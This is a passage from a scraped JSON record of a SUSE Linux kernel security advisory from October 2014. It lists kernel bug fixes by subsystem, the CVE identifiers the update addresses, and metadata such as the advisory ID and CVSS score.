(bnc#884333). - autofs4: allow RCU-walk to\n walk through autofs4 (bnc#866130). - autofs4: avoid taking fs_lock during\n rcu-walk (bnc#866130). - autofs4: does not take spinlock when not needed\n in autofs4_lookup_expiring (bnc#866130). - autofs4: factor\n should_expire() out\n of autofs4_expire_indirect (bnc#866130). - autofs4: make\n "autofs4_can_expire" idempotent (bnc#866130). - autofs4: remove a\n redundant assignment (bnc#866130). - autofs: fix lockref lookup\n (bnc#888591). - be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759). - block: add cond_resched() to potentially long running\n ioctl discard loop (bnc#884725). - block: fix race between request\n completion and timeout handling (bnc#881051). - cdc-ether: clean packet\n filter upon probe (bnc#876017). - cpuset: Fix memory allocator deadlock\n (bnc#876590). - crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not\n all archs have them, but some are FIPS certified, with some kernel\n support. - crypto: fips\n - only panic on bad/missing crypto mod signatures (bnc#887503). - crypto:\n testmgr - allow aesni-intel and ghash_clmulni-intel in fips mode\n (bnc#889451). - dasd: validate request size before building CCW/TCW\n (bnc#891087, LTC#114068). - dm mpath: fix race condition between\n multipath_dtr and pg_init_done (bnc#826486). - dm-mpath: fix panic on\n deleting sg device (bnc#870161). - drm/ast: Add missing entry to\n dclk_table[]. - drm/ast: Add reduced non reduced mode parsing for wide\n screen mode (bnc#892723). - drm/i915: Only apply DPMS to the encoder if\n enabled (bnc#893064). - drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at\n driver init (bnc#869055). - drm/i915: create functions for the\n "unclaimed register" checks (bnc#869055). - drm/i915: use FPGA_DBG for\n the "unclaimed register" checks (bnc#869055). - drm/mgag200: Initialize\n data needed to map fbdev memory (bnc #806990). - e1000e: enable support\n for new device IDs (bnc#885509). - fs/fscache: remove spin_lock() from\n the condition in while() (bnc#880344). - hibernate: Disable in a signed\n modules environment (bnc#884333). - hugetlb: does not use ERR_PTR with\n VM_FAULT* values - ibmvscsi: Abort init sequence during error recovery\n (bnc#885382). - ibmvscsi: Add memory barriers for send / receive\n (bnc#885382). - inet: add a redirect generation id in inetpeer\n (bnc#860593). - inetpeer: initialize\n ->redirect_genid in inet_getpeer() (bnc#860593). - ipv6: tcp: fix\n tcp_v6_conn_request() (bnc#887645). - kabi: hide bnc#860593 changes of\n struct inetpeer_addr_base (bnc#860593). - kernel: 3215 tty hang\n (bnc#891087, LTC#114562). - kernel: fix data corruption when reading\n /proc/sysinfo (bnc#891087, LTC#114480). - kernel: fix kernel oops with\n load\n of fpc register (bnc#889061, LTC#113596). - kernel: sclp console tty\n reference counting (bnc#891087, LTC#115466). - kexec: Disable at runtime\n if the kernel enforces module loading restrictions (bnc#884333). -\n md/raid6: avoid data corruption during recovery of double-degraded RAID6.\n - memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim fix).\n - mm, hugetlb: add VM_NORESERVE check in vma_has_reserves() - mm,\n hugetlb: change variable name reservations to resv - mm, hugetlb:\n decrement reserve count if VM_NORESERVE alloc page cache - mm, hugetlb:\n defer freeing pages when gathering surplus pages - mm, hugetlb: do not\n use a page in page cache for cow optimization - mm, hugetlb: fix and\n clean-up node iteration code to alloc or free - mm, hugetlb: fix race in\n region tracking - mm, hugetlb: fix subpool accounting handling - mm,\n hugetlb: improve page-fault scalability - mm, hugetlb: improve, cleanup\n resv_map parameters - mm, hugetlb: move up the code which check\n availability of free huge page - mm, hugetlb: protect reserved pages when\n soft offlining a hugepage - mm, hugetlb: remove\n decrement_hugepage_resv_vma() - mm, hugetlb: remove redundant list_empty\n check in gather_surplus_pages() - mm, hugetlb: remove resv_map_put - mm,\n hugetlb: remove useless check about mapping type - mm, hugetlb: return a\n reserved page to a reserved pool if failed - mm, hugetlb: trivial\n commenting fix - mm, hugetlb: unify region structure handling - mm,\n hugetlb: unify region structure handling kabi - mm, hugetlb: use long\n vars instead of int in region_count() (Hugetlb Fault Scalability). - mm,\n hugetlb: use vma_resv_map() map types - mm, oom: fix badness score\n underflow (bnc#884582, bnc#884767). - mm, oom: normalize oom scores to\n oom_score_adj scale only for userspace (bnc#884582, bnc#884767). - mm,\n thp: do not allow thp faults to avoid cpuset restrictions (bnc#888849). -\n net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680). - net/mlx4_core: Load the IB driver when the device\n supports IBoE (bnc#887680). - net/mlx4_en: Fix a race between napi poll\n function and RX ring cleanup (bnc#863586). - net/mlx4_en: Fix selftest\n failing on non 10G link speed (bnc#888058). - net: fix checksumming\n features handling in\n output path (bnc#891259). - perf/core: Add weighted samples (bnc#876114).\n - perf/x86: Add flags to event constraints (bnc#876114). - perf/x86: Add\n memory profiling via PEBS Load Latency (bnc#876114). - perf: Add generic\n memory sampling interface (bnc#876114). - qla2xxx: Avoid escalating the\n SCSI error handler if the command is not found in firmware (bnc#859840).\n - qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840). - qla2xxx: Does not check for firmware hung during\n the reset context for ISP82XX (bnc#859840). - qla2xxx: Issue abort\n command for outstanding commands during cleanup when only firmware is\n alive (bnc#859840). - qla2xxx: Reduce the time we wait for a command to\n complete during SCSI error handling (bnc#859840). - qla2xxx: Set host\n can_queue value based on available resources (bnc#859840). - restore\n smp_mb() in unlock_new_inode() (bnc#890526). - s390/pci: introduce lazy\n IOTLB flushing for DMA unmap (bnc#889061, LTC#113725). - sched: fix the\n theoretical signal_wake_up() vs schedule() race (bnc#876055). -\n sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035). - scsi_dh: use missing accessor "scsi_device_from_queue"\n (bnc#889614). - scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail\n (bnc#887608). - scsiback: correct grant page unmapping. - scsiback: fix\n retry handling in __report_luns(). - scsiback: free resources after\n error. - sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130). - supported.conf: remove external from drivers/net/veth\n (bnc#889727) - supported.conf: support net/sched/act_police.ko\n (bnc#890426) - tcp: adapt selected parts of RFC 5682 and PRR logic\n (bnc#879921). - tg3: Change nvram command timeout value to 50ms\n (bnc#855657). - tg3: Override clock, link aware and link idle mode during\n NVRAM dump (bnc#855657). - tg3: Set the MAC clock to the fastest speed\n during boot code load (bnc#855657). - usb: Does not enable LPM if the\n exit latency is zero (bnc#832309). - usbcore: Does not log on consecutive\n debounce failures of the same port (bnc#888105). - usbhid: fix PIXART\n optical mouse (bnc#888607). - uswsusp: Disable when module loading is\n restricted (bnc#884333). - vscsi: support larger transfer sizes\n (bnc#774818). - x86 thermal: Delete power-limit-notification console\n messages (bnc#882317). - x86 thermal: Disable power limit notification\n interrupt by default (bnc#882317). - x86 thermal: Re-enable power limit\n notification interrupt by default (bnc#882317). - x86/UV: Add call to\n KGDB/KDB from NMI handler (bnc#888847). - x86/UV: Add kdump to UV NMI\n handler (bnc#888847). - x86/UV: Add summary of cpu activity to UV NMI\n handler (bnc#888847). - x86/UV: Move NMI support (bnc#888847). - x86/UV:\n Update UV support for external NMI signals (bnc#888847). - x86/uv/nmi:\n Fix Sparse warnings (bnc#888847). - x86: Lock down IO port access when\n module security is enabled (bnc#884333). - x86: Restrict MSR access when\n module loading is restricted (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n", "modified": "2014-10-22T21:04:47", "published": "2014-10-22T21:04:47", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.html", "id": "SUSE-SU-2014:1316-1", "title": "Security update for Linux kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}